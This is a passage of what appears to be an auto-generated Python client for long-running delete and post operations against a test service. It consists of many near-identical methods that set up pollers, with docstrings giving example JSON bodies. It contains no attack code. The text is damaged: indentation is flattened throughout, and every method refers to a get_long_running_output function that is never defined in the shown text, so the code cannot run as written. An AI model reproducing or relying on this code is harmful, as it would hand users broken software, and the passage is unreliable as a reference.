raw_result = self._delete_provisioning202_accepted200_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_provisioning202_deleting_failed200(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running delete request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Polls return this value until the last poll returns a
‘200’ with ProvisioningState=’Failed’.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_provisioning202_deleting_failed200_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_provisioning202_deletingcanceled200(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running delete request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Polls return this value until the last poll returns a
‘200’ with ProvisioningState=’Canceled’.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_provisioning202_deletingcanceled200_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete204_succeeded(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete succeeds and returns right away.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete204_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete202_retry200(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running delete request, service returns a 202 to the initial request. Polls return this
value until the last poll returns a ‘200’ with ProvisioningState=’Succeeded’.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete202_retry200_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete202_no_retry204(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running delete request, service returns a 202 to the initial request. Polls return this
value until the last poll returns a ‘200’ with ProvisioningState=’Succeeded’.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete202_no_retry204_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_no_header_in_retry(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a location header in the initial request.
Subsequent calls to operation status do not contain location header.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_no_header_in_retry_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_no_header_in_retry(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns an Azure-AsyncOperation header in the initial
request. Subsequent calls to operation status do not contain Azure-AsyncOperation header.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_no_header_in_retry_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_retry_succeeded(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_retry_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_no_retry_succeeded(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_no_retry_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_retry_failed(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_retry_failed_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_retrycanceled(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_retrycanceled_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post200_with_payload(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running post request, service returns a 202 to the initial request, with 'Location'
header. Poll returns a 200 with a response body after success.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response.json() == {
"id": "str", # Optional.
"name": "str" # Optional.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post200_with_payload_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_retry200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 202 to the initial request, with 'Location' and
'Retry-After' headers, Polls return a 200 with a response body after success.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post202_retry200_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_no_retry204(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running post request, service returns a 202 to the initial request, with 'Location'
header, 204 with noresponse body after success.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post202_no_retry204_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_double_headers_final_location_get(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running post request, service returns a 202 to the initial request with both Location and
Azure-Async header. Poll Azure-Async and it's success. Should poll Location to get the final
object.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_double_headers_final_location_get_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, lro_options={"final-state-via": "location"}, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_double_headers_final_azure_header_get(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running post request, service returns a 202 to the initial request with both Location and
Azure-Async header. Poll Azure-Async and it's success. Should NOT poll Location to get the
final object.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_double_headers_final_azure_header_get_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, lro_options={"final-state-via": "azure-async-operation"}, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_double_headers_final_azure_header_get_default(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running post request, service returns a 202 to the initial request with both Location and
Azure-Async header. Poll Azure-Async and it's success. Should NOT poll Location to get the
final object if you support initial Autorest behavior.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_double_headers_final_azure_header_get_default_initial(
cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running post request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
